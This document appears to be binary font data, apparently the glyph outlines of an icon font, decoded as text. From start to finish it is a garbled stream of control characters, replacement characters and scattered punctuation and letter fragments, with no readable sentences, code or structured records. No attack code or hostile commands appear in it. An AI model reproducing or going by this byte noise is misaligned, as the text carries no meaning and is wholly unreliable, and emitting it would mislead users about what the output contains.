)C#'476#"&"54762"10'&'&"#'.'&'&76'&5476767>7&767674.>32&63"6'&""60'&672676&367676'.'&#""6&/&'&6567656767636'6'&'"&#&'&''.'&'&76#%4'.'&'&'"1767>&72132767>2#"'&��

%


+! 

!

�	
0


(

	
$29#%
	
	


	

	 �E��
	
.3% "#"(#*%9		)	<
	��5$	
2#1!.2
 3$
		&
#



����".6<2"&4%6&'.>'7&>7&''7&'67&�Α�Α�:#		IKG'd3+$"7�0!^e$�76H%
lnR.t3
 =Y�M?E��Α��*
JR#9C&(,9!A�R<8.
 �%MSK.4ZP����S%#"'#"&547&546326322654'&'.543232>54&"#".#"�B.&UxB.&Ux�-C[*DWA		



G�&.BxU&.BxUr-)9	()

	
&��t�?2+"'&54636&+"?>;2>7676&+"&=4>;2>5C0	
S�
�	Y	I
Z	j� !�	��J��l%	
������#52#!"&54=46354&+";26754&+";26�!��!!�SS�Q
Q�!��!�}(!����{������2"&4>&'&'.�Α�Αk!&"
q��Α��Q	
	
 � 4`M0+".'&#"#"&'.54;2326=.54>;227>?6;2!)"
;


(/`$"-;=]$		;JD3	


&!
84.[0


=`	
W	
t<	�
&0>JT\6&&676&"&547676766.766&76&&6'.7>'&>&7&76�
&3
�U�LH<,<IB@D4	_@@S_@@E2U&%J7CA 

< c
		
9$

��L=CLH'155+.iS3DS3w
.Z05R��	53	

		
����	&54>7"'>77.=�RB:6^:)?8-??-7!6'XvR� EZ=iE
�Q..QX3?M)��\Z������R%&/#"43267.'>67".'665.674>2/>�21-a90Q%/,7%$4##&
#*)

&&7�&'
>H;3	-'

$,

"$$6
*+(
%2)%
����7!+5#"&=!%5!'2!5463�&W�&��d�A&�d&t'ZZ'-UUnUU�((����42#!"&54636'&6&'."6323276���P2B!
	-A@���`�?N		 *f
#!3TR����+4BKW7"&46;462"&5"&4622+"&54>3462+'"&=46322"&=7"&46;2#^&/''/'/v

3&/'
/'/v�'/v3&/'
/'/v

��&/''����/7AIQ.54'76&#'&33'76&#"#>32"#"#"'76546"&4624&"2>e6BeL	"8!/M	#^7S=�A#$�:0A<�Α�Ά�ċ����g>-"4G�		[��,48":�	2/7:b�($Α�Α��ċ�ċ����%.546777'7&'57DWumS7EM:D��%(E3# R85Q
+	8$&:T!���+����7&#"7.'327>7327�		    g	;/%���9*7-39�`O$4����%#"&4632.32>7#53�kg��gaEC YM7Z@#7���j��ΑAA!M2A\#"V����;IU6"&5462$"&462"&'7264&#"'&&#"32>54'>&6"'&7672"&54>��Α��

$28=2$	N61$UL
C�

�Α�Α�
NV
(7$t
Y


����
%5`%"'&76276'#"&5463272#"&5467#!"&5463!2"&'73264&#"'&&#"32654'>&RHW[���`d'6;B6&T:;Sf1���`�
U]!	*<<*
!����%92"&42754&""&=#326=405#"&='32>�Α�Α�",>,

:,,�:

",#��Α��!


+*l

-.,+kq.0

/
/+#����1%"&=726='54&"#"&=332>=462�B]B"4�B/.BV
C[C4�F.BA.FGH:�.AB.FE
�-?@-$����%3#!"'&'&'.5463!225#5#"3326���	`��	��	|��
`����	��	 `	!%)53#55#%3#535#75#53#535'35'3#3#R3�RH��RRRͅ�R�4444L���]]��))]])��)�]]u3�����	#2B#"'56322#"'567#!"&5463!22654.#"#754&#"7532�

G

���`��+"-3�+
4!DiD���`�/ %	�
3:B.�
3��9�@D����7'26322/>&67>77367>?"&75.#	&'<7465&#".'&'#"&54?.>3263263232654.547'6'632763'7>31#��	376I
	
G#


,g�;
#,
	"	?!
,�	�	0
5/)



'�	E<
��		-


\���	PK<	
3		! 

4.

"
	

#C�3^ ����(:T#"&54>767676'&#"&/"6'763276&'&"76'&#"#".#">2@	&pNNt&	(
 +
$P&	
	
V

=
"+#3(*	
0M,E'RhmQ%D*#&
��	D%**"$

1����1Je46326&".'.7.67>>32'64&"#".'&'7264/7'#"&5467&72767#!6*,
d,3!
�V6"#-,
Z�#9,d-[(b0'(7#,,

Yd#*,d,2"6!_U
#!8--
Zl!#

,d,[	(0'(#!7,-X@u397+32'3254#254+%#53#32>73#"&546323&#"�AH5��q�O/5
:8U���8�!>\<GI::C�s3 �H34cX3NS+(�/3b�#� "VJ<;MP7����
#'3H7+532'+5322#>7#!"&5463!235#4'654+32674&"327##"534�-.+(�?���`�NN+#>Z]'�$?(
2"	"d�47--���`}�)

0�+ +* /
#����!2:B%#"&'326'7654&"&'>32>&/6'&'6"&462264&"�BsCU�_&*T(87M7;��bg���

 	(	�3%%3%R''�CsBeO' +<8''66'V
7`���
	(v$4$$4&&����6>I>&/6'&'2#!"&=326'7654&"&'5463"&462264&"�&���Y'O%53I38u0""0#;%N&&^��q%(84%$33$Q
0��"0""0$����.C2"&42654'&327672654'&#"327672654'&#"3276�Α�Α]	
`�

|S Md20
?0$	
R{B4

<�5��Α���	9	2B
-
L
0
��@�3#0#57'#53?3@b[�
,	]]V�+	bc�
�	T	]�	�	T	5�K#-9DN`u�����7#"5'743272#"5'7472#"5'742"5'?2#"5'7462#"5'762"5'?#"5/7547632#"'&5'?47622#"5'72+&=476326%2#"5'74'2#"5'742#"5'7o��	s~!..!�	7O��.�AEEA)iEEi�DD�`####9989DBBDFDDFr�@  ��:B��CC�8/ !.	�	I6<�AA��CC��CC�����+%#'.'367.54632&'654#"�O*+%$
J
;+-%+7/(0

"L�44\
;K~Km�5,>N12A)<:

.:9��� $(+/&=4?67'775'?'7'75�

��

�
_MجM_�7�_M�NNNd�M_�7 �����;g?3ss3?5J%�g?3444�s3?5J%��A�$I%##"'.'&676'&76067>6&'&5.*&'&35236'#"'.'&67>76'.5676676.&76�"	$#�J$;
'&/("MD7
+
"/26(&"#
D��+;'I!
,!%B'
$	"1�D$ 
."#C1)6%	(�$X6%		
('B<s L
!
		&&H	
%	
/,
����["&7>721>?>././76&/7>?>?>./65g�<7
		

-,		


(�8�h<i#36B

 
	
	32
	
	 +3
	A911D+m�	����)6CKSb�&#5&'&'&5473.'77'>7"67527'676"&4624&"2'67'654'7&'"'7&'&'7&47'6767'6327' :a

)=�

�:b);

a:=)$b:=)o�Α�΅�Ċ��c

�

4	@@	4


4	@@	4�90	.�	2991	w90	
/-	09.�
	09/�Α�Α��Ċ�ĊW2r1	�CC,,CC,,����CKUn72#"54746#"%#!"&5463!2#&3254.547>54'6?#3&464&#"32#47##2313275#"=3�M��`�>

!'A9((



w%(

	%dt

���`r$"6		
"�

�3!? #A����#+5Q]e74>27#"&5475&675."3254'254.#".="534'33&#32#".54632#64'*8	$ &Z&6-W'+&-

h83 �		
8�!-
2
-

L#)/*��""20

X0 	0[!
	o������!!77#.'#3��@�Q#	%P��@�6�-/0"�g��g�-'&67&632'2'&6654&#""'&>H	77 !;k�Eb{Q>jP9%>"
	'M0_�93!!sDbENeRC9P$9G#	(VG-����2$./"'"'&67.5'"&6767&632�n##m 	
!QRQR!
7	
7
	0 Q^yx_Q 0
��3�(6GS"#"'7&54632&'"3264&264&#"'#"&46322>54.#"32>54&#"�E`
1DNrQGq	r

��D6(F``FBc�
o
Z@	";7ME`N;5



0



�=40
SuST!		����F^2"&462"&46'&7<5"&#'&7&'&625463!254.#!"636626�3$$3$�3$$3%�#G6"(&	&("6H#g
��B)

 *D&!0""0!!0""09*f4!
*)!4g+
�
��	�

����	!##5#5!3735#5##5(�uW9<k���Z9k(C(���u99:���99�uuuu������&3@7&'&7>.?6'&7&6&'7&?>%676/&6*dk5	J+mi
"Z	
k	>!��6:
"	h�1 
,)
�Ro

�"
'�
[	�
�	�������"K7+"&7>3262"&7#*+"&76763:>7676oK;H$
*m�$y@
  �s	O,Y�BpW�	����
)&'>&42#&'&6373#&&'&'&6;2�507h<�m~r
|JYAUM21c2
">LvnM	X�¦nfja��JH��@�%)HS%#70>?#!"&5463!27#/&'#37#74'&56367&#"#"/26'#"3673�!m� ��X@+'@$�(�"$'�  <*4�&+���`��jG���2
!

	#�
���@�	
4BR^d���������
-9F$"4!2#"462#72#"42011"1"1"1"1&1<143413030310030410+353#!"&5463!2327&67&#"64'4#"&#"5#3<>323<>3237#&#"327374&5427&"'63'=35#5##3734#"7'&7&5#3546467&7'7#&737&5#35467#&7373535#45&1&0#"0#111323210606107#'#537374&#"326���xuuJ� ��Q9*#76#*9�555Y	-

(	#


	:


	5"

*Q9*#67#*9Q1	Z��`fsQ-�,�)�))�v%	
	
%	
	%	
	 	
		%	%			|~U:Q-�-Q��@�'3:BSkuy��%+53272#!"&54633533'654.*#35#535#535+37#&"264'&75&546"'654&'&5467&2654.+35#5!26%+532� �
:-r#$;%%^! a

,
$l
[�3�z�	�*		�
���`�R!!#RTT7:%%
/

	




RRR�� i	�6����A�.7:AMN`g{~1Iamxy���#<.+#532254+2*##'#5377'#3#57254+'#3#3#53#54.+#532254+'#5#'#'##7353733':>7#!"&=3673353>7352335;67323535#&'#&'#"1#"5#.*+.'#.'#5463!2"#"5*5#."&*#&+.'#3673465273<523272?"+73254&"&54;254&&54;#"6+5'#3##53'63023"'&47'3*;735353#'#'##"543'3#E'
!BC3)$$j?

'&&'77I�
'�"#��
� 5�B4)(+ (g.(�#		O

:SR
0'�$	  
!W	
!	
 
'&&'889	""!Lp
	EZ	E6
	8	�Ej EP6666EBB//(�Z�						\	

		
&n�]
		
<	
(

(
E^
7BB11E44"#(E��@�	,AXr����7#"54632'2+743!2+7437#!"&5463!24+";2?46:3267#"&#"327;2?47454+"'&+"0;274+";2?>:1267#"&#"327;2?474+";27'2#"546�

	j	 �� ��@"(T
%@
�"(T

,J

�	
	
!
���`�f

@b\'&nf

@!h1	


��@�#@PZ^bq�%2#4>2#"'5672#!"&54634.54325&#"#"'32675#53275&=5&'#3565#752654&#"'#757454&#"3275#"'�
$	q


�� JE#e
$
=$$$n $
�
�		5���`�	"			"Lr
3!}U
b}}��! "	�(	3$
	1OX7#"&546323254.'&54632&#"	#"&'.#"26?�#>BD@%)=

D<-^;+


zFE
) (&		Q
FCFM%<-'J#
	

Q60	(
/3*	����g2#!"&5463254.1&54327&#"2#"'.	#"326?'#"&54632���L	$:%+
&.		
(+#
		
���`��3	/%.
0,&
  ����;G2+#"&'#"&46;&546324'!"&463!.#"!2#!326%32+"&46h

5�gL|C

5�gL|��

^8Su*

��^8Su���

�
 g�TDg�TD`/9uS/9uk.����'/8E��%#"&547&54632&54>32>32654#"6'&"32654&>&'.#"723201&'"##"&732654&#"32'67&[!iVF_3/%7
P!"/�."	=0�
Y!r(
1
	.	C-A6	�0&Xs\99#��3%/^�xeC�
Q\�P:(
'!	;A		

?$!)/�����#%#!"&5463!2#37�+V��`A_�_[p)��`��*��[[
��3�JMR_finquz�������������%#"'#"'##"&547'&547'&54?4&14?&54>32362363225#7575'#075175573'7'37'77&='&'#'#7#"7'"7'737'37#3'#362?#6?#747'74547'67&74kj	476	8jj8��,,-,3483,.,rb@#�PSPY|D"uSb:�9
h3�Kx63)O<<$$kR#[c�i\&\a|sZ#V.#�
_Z	Y_
\
a`	��L30?\4Z`�H!<KfC��RXT\G�|Xed<=y66G6QS+U?sL&2;V�_Z__S\=lO�����
7+"&=4633'54.+"Gf5&�&55&,�3	�
Xh�U%00%�'7��5{		
�
����	'7&54632%&'>7&'677&'>7�\\�gq�!!�p$74(-CyU�#"�g�\�$�a!�rp�!��0>}B-k#�Vh�":�%:#&&#"6326"'&#"&#"+632632&#"&#">32632�8/-:8C,0=*)�$"75>))>57#"*>G@**@G>"/6>))>6/"!18//8#9Q�+)��))]##��&&��	��z�,<M]%#!"&5467&54>32>3254&+";26754&+";26754.+";26754&+";26)5I2��2I' '[:Ec��				Y				Z			W				�
C+3HH3$<&8HcE�o		o		�		�		�	�		�

�		'����#'+/37;?CGMUuy}����������������?7?7'777?#5##5##53#53#53#5##53#5#57#5#53"&462'6#"'32654&&543237&#"'#553%#5!'%!5!#5#57#553'53'#55353'#53#55#53'#5d����,r�"
"
"�!�"Q"=!�"��Q"$"�L66L5�!	 	ya��*�����z��z�"�!��!Q"u"/"&






B
	


>

g















��""�"�5L55L:
I""�""M!!0�jbb��U�;;�!!+!!��!!+!!xM""�""�"""��"*2#!"&546;235463264&"264&"��>j��7''7'�7''7'���L((��'7''7''7''7�|Y%#".#"327>32#"&54>3232>.#"#"&54654&#"#"&547632632�D26()!)'5*9
<+C; S(@Z)F*!<,,"'%.&		%	!
C2(&@3%.Bw1B#-/,$,>>,*"R?*E&",/,"))	2A	,%3	>����@2#"&'"'&54>7&547632>54&#"#"&546�Ik$=&(		


%	&	A5<P	+{�\I$D:",

0	Eh	 0
K 214:N<,>0Pd���� H#"'7&546322656'&"77'&'&5476323217676}C�\91v �\\\Ln96�mF+�
	)1-	!
_CZ\�s3<\��imLJ86lL5-D�?	)	
����3#3#'#53'#53'3377#�00DRgYYgRD00@Q^Q�6�p0 0��0 0p����@����(!!5#'#35'&753735'&75&7��@tS;DW Z O	Cv��@V��"�&&s��������!7#/#3��@�N!.-#L��@���[
[�^����B������������'8I[nz������%'''.567&667&674665".'&7>762263&'&'45&'&67666667&6767&'6:>5>"23636#6666'6&'.6767&'"#276&67&54&&7&'6757"2654&&#327>'"#276464'*#'7>7>7&7.#'&''''&'&'65.'&26'67&'.''&'5767#65&'&'&7&5&'6&3>.>6&5467"&7654'64>76&%'.'&6'&'&6=3
��3	
!	
(
!'%
/�T'
	
	N
4	�P
2

�#-?,,T"5#J	$a8
KQ/K*
	


1
255+7S
98��717�2
$�B!<4��
%� 
%0��
%
	
))	"

G	"G%
"$	
	
�	
!
'(!$
	!&'	("�# -- -�# .&

$6 	( O
4*!


�
&	O6R
		"3%& �
 ��	

	�#

�	H	
	+����0$"&462"2"&42>..'�&&�&&Q';('33&XQ:aB9*e�&&&&)#,8%'
 ,)����#3?OW_2"&4#;2=4>;2=4&#"54&+";26'+"=4;2+"=&54622"&4264&"��}}�}t		%$		9(-����		�		�Α�Α�������}�}}�		  		(9-�

����5
		

�Α����������@� ;Nc%531"#527#!"&5463!2##"'232>4&7.675&464.'>54.'+326�&

((h� ��v9
�73!"651""1�	
	u{� 
#���`� %	!!
2
=
���@�
'62"&45>54.'72#!"&54632654&+"3��gg�g� ((p(�� OywQ[5X4rOpg�hh���9F8

8#x��`�`qMTn0Z8Np����)8D7&#"327#".54632&#"327#".54632'2#"&54>2654&#"�!
!!	,
-.�!	!!	+-.yi�)EZ0f�?sFQzvUVuw�X'"(%$X'!(%��h6^?%�gBrD�=sXUvzQSxt7'7'7'7'77''�gg��-��4M���-��4Mg�gf��-��4L���-��4Lg	����2"&47''77'7'7'7'�Α�Α�JM5MM#~�~~JM5NN��Α���KN5MM$~|~~KN5MM
��Gk
3;MU]ju}7#"&462%2"&46&'''.7&'3>3232323$4&"27>7.#"#"#"2.6$"&46254&#"26%#"&4624&"2�		d/w%$s/0#	Z$o+)m$`
#��C_DD_`P7NP2%!VZ(!WY��*;**;': **;)''�	�%//.-"#v0  /u_CC_D~7L#1+Y(!VZ(!{;**;*H
!*;**1''��<�(4@%'&'.7617&'.7>26?6%4632"&72654&#"!9L
9L
#	L; 	140
��L6#<#LlLB&4&&rL
#	9L
M


�6L#;$5LL5%%%����D6462"7#!"&5463!2264&".#"&/&?6/67>�  ���`��/D//D%	%
0

0$

/
#
�!!���`SD//C0�	
/

0$
0
����+2#"&=46367>54&#"&'.#"2��]]��")
" 

*"	��]��]��� '!( 	������L#'&1.'.<53>7.'&#53676.#<5:3.#5�'+&2RJa
0� j
!;-�		<)&;@z�(
cZs)��%7�80

�
8=
�

B7.



{	�
����jp74>32#"&$"&4624&"27'4#"#"'614#"&'764#&5473254.#672/632327"37.#"'67��Α��v�����9+K70B
-K90@!�`��		oΑ�Α�������|
A+M90A+K8/�����
",7'>32'&4>32"&%'76&'7.547�M#f7C:@!�)#&#11F1;!<P@Jp�M*?Zx(�v,0!%B!;&1F11|S�.%�$X!�')}�\J>������%0"#"'01&'&'&'&747676747673467676773316676767"67203&'&'&'01&'#'#'>76'&"'&/32656'.'&'&>?677%06�($"?	
			%
	

.@
 


	���4,	
	&B05-)
"
	


	

A- #&"
]����%"327#"#.546;2&&'>4&'>:=`*
&=W5.F_c��g^F-0G*76+GO�Jk~0K?�dg�?�sb~bJ���	�!*2<!673#"'.546767>667&734.#"7654.#"�&��/?DywJF ">59O5E�Qap�I
	#)IY�/*=�C- DI$3 DN&# Q gFOUk+9'�%9!
*�,6�J&���27#"&546;%2+6''.'.676767&'-
P:
�4>�7#

$6� �/*A|0#>���=g>3E/;73!����J_q�7&6765>32'&62>54&6764'&#"#'&=4;2+3>.4>#".&6.'&66'47'&>3276#"'#"'&g
9((:O2	$*8'Z &&'77&
��%eU;%9HD<0%,-.
%0C#	�1�oT	
5IRR�		h
	^%79(1;	&	/ &m'&&	
�
�("Q5*E'
1*

��1&_?0J%�

����-6Nd<.#*'4632&'.54>576#".'&62>76&7>'&&>76	
JI>.9&
.2-%3%T
�$T/0^37&@9J'$	*

&
		(@�
8$+ ,W)7	
�	))


&
����	%##3#i�n1�u��hV������&#"'&'.#"'>76?676&6�Y[?'		
(	4"!]E&ArwI#-)0%
L�5-l����
!!%'7#��@<@@�@@\��@{�VV�Y����,?N!!274&#"#3235'&74=37#4754>35'"454=#?'#'##77��@�3#!�,8DSgPQ		 ��@3
	%oq%

��l�

!����*9GT%2#".547.6326?6632#"&5'632>54&#"6'&"'&272>54&#"�	{X9a8	9O	aXP9��
�ky�&1?Y)E*

0'(�	!}'ihR
����'701!67"'.5&736.'#>32��>W\Nb'4Dz�Gq$zc@h�4-6	ib6�9!.+G4];64����-%2+#5#"&4632'#"&546327.#"326�
WAX2g��gGp#��=+O>WW>H-;]7[��[:b�,a�.C&�ΑIAmnHW>>W?#/5���;����%''7'57#d%��S�}�.*�}���TA�`&�:��:�����Yeq%2#54&"#54;2354;2354;235435&4663232632#"&#"2354;2354;23543%54+";2754+";2��"*"�$$%	

%%$�����``� �    p<&    � @@@@����Y$#"'&=#;54;2+"=#".+#"&46322>7>23>32#"&'#"!546�Y�
	Y		Y	'e&**&			
	6	Y�
5$
<"		Y		,6,*:*
"	!<
#6����$+5326"&4624&+3532FFFȑΑ��3$x2F$�JΑ�Α�H3�J�|7FU%#!"&5467>322>54&'&7654&#"'&#"3$#"&764'&>#"&764'&>�"8'��/B7*X6A`	J4%?
**
%	"
	�''8C.+?3?X�


4J)!	);)x�8	-l-Ia(	H

����:7&54636'7&"76&%#/7327654'&7466*^I"<53%8C)G!G(

4RmR=#!@P_"*&�3IP
H'%*#	6$*+),IH'0A( ����&'77#".4>327''77%+*|,..C97D-,B3�O}J]]J+V��V+Y3O7&	6f�i89gKX��I^\I����'�7''7'75#'7�b�VllV�422�g��V ll VΝ2djd2�����1#7627'&73%'#762i9�8f���^���88�9�����X�ڸ	e���
	�&�������!)-%#"&'*##".67.>2%35#5&''35#�7#77#7!=ZfZ=!��**�-e)&lm��~8//8&TJ;##;JT-:� "j:	���� $(+/36:#!"&5463!24+''#"3!2#5#5?##5#5?##5���j%	o==o	j��IIIT6v���p@v�cu��j��jK22K��%%J&&�,u%%J&&�,��%%����12#'".'.&56'&'&'.V�P5QF! %&#D
	$GI&

%6(�,>=E10RG	.A9l
,!�	g,����i#"&54676327#!"&5463!24&'&#"'>54#"32321/4>14&#"3267>4>7632�	

���`@		
D+ 

"3	! +
,(0
3��`�"??%*) <

8$ ����Ha%#&#"#"&546327674"#"&54>32>32'654.#"3:>76�#2	(5R6(./

	BI%R6$0
�	
�7

8Y1'6	*-GB-XA-$f
	P		M(?������1F&'67"'.>32&#">54'654#"'6767&547>.%$
3�3(&Y;!:N3!#1	m;Ob/&KB%
0**JMX�
CJ88*p^B	T:";'AUM'79�DR;$cI)+
!2����@U2#!"&5463>''3654'5.'.5463267&#"2726&'>7����

1%D

'1$%8 c<
)	.���`��H%3+U$"#!	1./6(	0 $5
);F#�.>	

����h2"&46'.'#&76763654'&"'6'.#0"1"#"'&3263277632327>76�Α�Α�


 			
,'��Α���	

<
<
�����l%#"&#"''.#"#"'.5.'0547>7056'.'&7>327&47>3023232761�<	("*
			
	
%(	/)

$7								
I$%I

	����n2#!"&54636'.5#&76763654'&"'6'.#0"1"#"'&03263277632327>76���Z

.	
,'���`��	


<
<
����
#7463!1#!>7>7>7>7  F1GE�1YXF1��
3/#
"%!<H1FZ9f��1F&4H) ����GMSYc?27777''''"'7&'7&'7&'7&547'67'67'67'6'7'7'5$"2654
�
-
2=
@DC@=2--3=@DD@=3
-
���������ʼ���bb�bۄD@=3
-	

	-3=AED@=3-
	-3>@D�����uu�vvPm�nn�;bFEccEF����.93#"3#"&=4>73	5>574&'&'37#6734'7[��++)%6*�C(

		0!
>2��
�1=t)�)5%�)82i@E&(
3.GA1����.
���
Xcu������462#"##"'"'"'#".5#"'67&'7&'&54>3267>761>32632632$2654.#"47327654#"&4&"326574.#"26574&"26574&"2657#"&5476326262632>74&#"32>6�
	&N
		 	 			
" $6	$G'

-

��
 - 47)	1
	12M/?!FZ%"			 	 		 &3)-")R-_

	� O- 				7!25$" &(Dt	�!B6#
�		 
	 		 	

	 		 	

	 		 	

	�.iH2>.VN�*?$�)����%12"&42>54'#3#".546327&#"%35#5##33�Α�Α�#7uF)- !"13II##$$$$��Α���7#
+
 .! IfIj$##$#����=2#!"&546354#"#"'&#"5654&"32756=6276323276���.(
%"

&*
 ���\��	
�-
����BFJNRVZcgos%#/#/##&1'&'&?&5'&?&/&?2327674?677'///7'75'??'?�
7CTA&{Z"$#;F�e[yj�IP9@
F+:
>NOU\_BX@)J3�H,!6.CENd
�',�# $&9a=/�79�1��=^:�=D<�>F=,DC/DJC("?$A����4%#"'.5463232>5'654&#"327.#"'632�(;%:tKxNOwJ
r588338

+!)=	">(dAUpoV_:$

:%?PNNPON

��8}h��#".54>32.54654&'&563254'&7254>54'&#0&'<54'.#"2#"&4>7>&'&5462#!"&54>3E
#!�$:


 ,
�	" !
	'
&��	05}2
1N+'I.�
/Y!!"0$


&(1N*%H0'fm)��	����2"&46&762?7�Α�Αr�
=�s>��Α��]Yh?.
����2"&47#�Α�Α(U�U��Α�ε������.6>�%/&?6''&766'&7.7627&76"&4626&'.>;4'>4&5'676&'&.'&7&'">374'&"417670.#636=4'#&'6767-

	N
!	)!
��Α��O
	
	

	
2

'	/].('�
		
	
	$7Α�Α��
%
	 
	;	3		

!5
n*%#����X%&5>56'4.'57#.+"72>73#.'&#;2>7�
��h	
�X	C-Y
d<H�r~		
�
KI�'
	$����"3CQ[2#!"&54635#35#&'#353732326'454'.#"+54.#"5#3732'#52#"&5432���L!�++(
.�
		uU���`�[���<)�UUWW*


c$	
*�
\1T!*
���,1:Gp'"#"&'*#./&'767676767667./"'.'&>54&#">&6?6'�6873		Fm
	 D)#
!

{�
)S7�0;qPJ6I;J$	0_
3@!-
"!
	$�m>!4DUB4A%"2(
9�f
-

N4J)l^8Pr1N 	'����7\2#!"&54636&'.14"&'&'."04&'&7676&"&306/.>1276a,8'��'88'�*$	

/	$|%Q)%/�,��'88''8��IQ&/)

HQ&
/)
����7&7>7>6&'&6�W?_E#ZZ#W?`E0�4P<'D,P<;Z�W>VFe	W=WFe	�;X"@'<WN���#'"&4624&"26%'#'#7'7''7'�Ԗ��v��������W%W�/213DEDm77*Ԗ�Ԗ�\������%W%R^ddk
|D7�����'0=DMm��6&76'&'&76.76$&'&>.6766&'&>7'&6&6.''0&'&'.67&67>6.'&6'&'"'&#&'&'&767>7667>763266.6a
�	?�
1�m

+
T		FE&#'f*3T
^(+

	
		)		%
	,P		���		L�
9	

<	

w!K$
2?#J2$ A5
@`
b
"k
F
"K
	S����-=M2#"&#"##"&=&54622763232672#!"&54634&#!"3!26S
('
#"
&<��j��\�,�


	

���\�r\��	����)4E%&?'>.#"'6?'.?6176&"&463227.547�

)*'1''#.L+3 
D�:j-*�'FA6!!(/��
z $>-'<2#' V.

=Q C�*��('A&5*'8.������1S%01#547>73&'.623632&7.#.#&5&7067672?B.,]rvy3��
::�q�
z	���	;9v
�*)"%txBy+	�/	L""6
J4���AX|��2#!"&546367676'.6'<.'&67>4&*#"#"&63!22654*#".6767626325'&'&7>0&".5&7676��;�';1C#@=		73	��		�	*
	 )-4	%#	5��E&��|��
'!"			�ZG
	22!.;32H-"�����&>#"&'>76�MU,MU,!I}J=l&5V
$7�k4!bj4 ^
K~J4-F13!T����"4EM2"&46'&'"?2#!"&546337632=4&+"767676/&"264&"�J44J4�)�#��##-T
BiJJiJ	4J44J$C���##J#U-	�JiJJi����3I2"#"'&=#".5<>7>754.#"&'&'&76532�a_@5X"0
�D(V

L�E(�I?��		&	7��k

��0�NGV_cf����%777'77?'7&7>721?6?77?7?''&"76?6&2>77'/???>761?6'7?7''7#''767676'&76767?&'&#7'�###"@/ 
 x

��$!%
'%A$$%%6 	K
:(�		
;
��( 9
&		' 
+"%	)&�p
"?��qsvPS�xx$&" (uoV\>

&	B<	&(Mzfh?B)
 +.N--+$'%' *(?BO@		
&����"7?K7>32#"&46;7'&>.?6732+&'.'&67&2"&44&#"326	W?�		4BF�5		2�Α�Α�YZ~YZ~G	�
s$	�"	+"	V%	��Α��gZ~YZ~����2G2#!"&54637&676&+76.'.#"3!264&+&'>/���O�>V		A34+	3���`��!=
�#rJ$X!	V�!,AMan���7254#"#47632#7##"&5462654&#"733>32#"&'##74&#"32673>32#"&'##74&#"326747632#32653#"'&7454&#"733632#454&#"#*
&	%,
''
Z&	'Q

:&

	'Q

	
5
! L&
#&M]'	#
'�		L0_
	%(
	Fl
O
	%(
	Fl
# 
	
3		.		D��A�/7%#'#7'#7&74767676&'&>67'?If.!�$!e"E*;f!1+2��I:rkrTWZ�`6M&�Of!$!�nG
5%"37)*= 
!.S�N�,2.'7!9�z�5����*+%%57.#>32632&#"'>32'.�����@~6�D[5#B5��#<<#."4�)�MM�)11����6��6ȀG8*2)1110o?II?DAT�����02#!"&7>37/>16./'7'67�"91��"91�_
g	E:4)s�)��))4)��w
qd
0=
@n������1>f���7#*&'#"1&7&6256&"#&47>323226765&#&/&5"54;67636763:'#/'"'&=47>'.'.5&632#.#"#"#"&'&6;26766&&7>&7�

),(V�
2
$!!%4!!�!	
#	
'	
	3�CK�7=�F4�/
	I4&�
	

"

e
��������	"
	#h&)G2#1			M����#42#!"&546354&+"#5#353;26'+".=46;2�

��

@(@@@@
9@(@..�
��

�
��#*('K�#'(H����?Rg"&4626'7'&'7'&/022130"''&1377676'6".#727&".'72��Α��=%
	
#
"3(9	






	
'Α�Α�*-+,-	3H	-,--	-6<	
Q6����
)5O62'&"..7>7&67>'&6'"&=462746#"&=4632>NG�I?�>i`b
UT

�	
OR^�			GE11E%"!%}CG=:�e�`
	T�
�Q

]�1		H		�

G0++0G

!1! 2
s!)2:+73272+72+732+7%2+72+72+7�"&GD~!%F�IF�GFFF(	FFyFFKYY�1Y1Y61Y�	1Y61Y����>`7>232"'.2"'.76#"'&'&'&'&547>76 '&'.'&54'&'&'"76767>�	

9C)	04
��
I!V"2+%v	�
X�	
�� ���.:G S������&6G%"'.'.567>7>3%327654'&#">'.#"?�
�";	- '48%(,
��	--
.$�	CB

TM��%

3%-L^
#5
)22	�

����#'+/37;?C3#75#73#75#73#75#3#75#73#75#73#75#3#75#73#75#73#��xp���xp���xp����xp���xp���xp����xp���xp�����ppx�ppx�pp(�ppx�ppx�pp(�ppx�ppx�����#$.>.7>7>76.'6L)5!)58Gs8	K8/fYH+�H5K;+3��5!*5!��P~F@e$>]4m��"C2.
)�u;����'/6"&4767&#"&546326&&2"&4264&">L


$'7L5-'UI�������^^�^&X

8*	6N"q߃�����^�^^���M�
 %#"&462'""&54632654632L'"22E1T".0G12"#)5##--&1F11�-#".."#5)#"21F1��q�)Xhu��7#"&=46;;2>=4#67>76#'&77>76/6.'&.&677&'#"&=46;2'"=4;2#754;2+"+"&=46;2�1/	.*75/62
G2$q%;Q�9,
7$>4R60 

&>(D�(

(		}


�				p�(		,5
+Y1+9%">,%)&".#@/	4C3

93$
�
(

(
(


			T���
2S^w�7+76;26'&++76;2";2#"&7>;#72+".>;+";2?6+"&?%2#7632+"&576&++"&?3+"&?>;2+76;2?6+"�
 	#%	
�

 (�90#	:	�$�		�IB
	/5!�
	_�%(#4

"c�#!(	@bJ(
����!'#31/#?#7�#���{p�651cb
os��t44<//.=
&J�2����%#"&4632.#"32>XA#_5g��g5_#A
6*>>*&�R#&+�Α+&#R>T>��*�.y���&767676.'&'&76'&'&0&'&0&&'&1.'241676727"#00'671327>7213"767676'&'4.501&'&'&76767632767617'"#7&'0'"'"#.76&'.'&'&'4'.'&7:30236'45"37>'&'6%&'6&74&5&'&5&76767&'&'&'&7671676'&'6'&272637'67'676&'&67&'67.4>56'&'&"#>767&R	"8		
 
�%	"))




�,H+#	
)%
  � 	!0	
			


	
��
"	
	
  
		"
 	|
]
)
;%

$X-.
-			�V


	15+*
!$% 


	
	

!
�




	
	�.:JZ3#5'.546762654&#"'3#5'.546762654.#"%!"3!2654&'2#!"&5463~44-.@
�44
.
-@	D��

�

&&��&&8�	&'	:


��'	:

�
�


 &�&&&������GL767>454'.'37#73'##".5&#".7547;2254'326&�
O
	4"�w�ZJ![!&R
T&6
�@$@&
	3+��7	

#/�

)$J���"'53'3#%#512>'.'&#4>1#53WJ�>>�Bj<3P-7]<`6[v@8S�__"JJ�=�@v[6`<]7-Q2<jBS��_����
%]$#".54>32"2"&4%&'!"&5463!24&/.+.67'"367./17672>7)
s(:=��XI
	
 ,h+.#%(
"S+
!
�

��5390Z��$KO$


	����
2+4546264&"7�\��\�Z5KKjKR�����[���KjKK5!K����#53+32&+325��0`ӽ�__q ��~�T��d
������-159=%#535#5#5'#53#5'#"'.7!27&6?6%#53#53#5'#5^BBB�BZB�BW
C)�vn8�	%+�B�B�BB�;�==�;;H<<<<d	.ciB!Z':
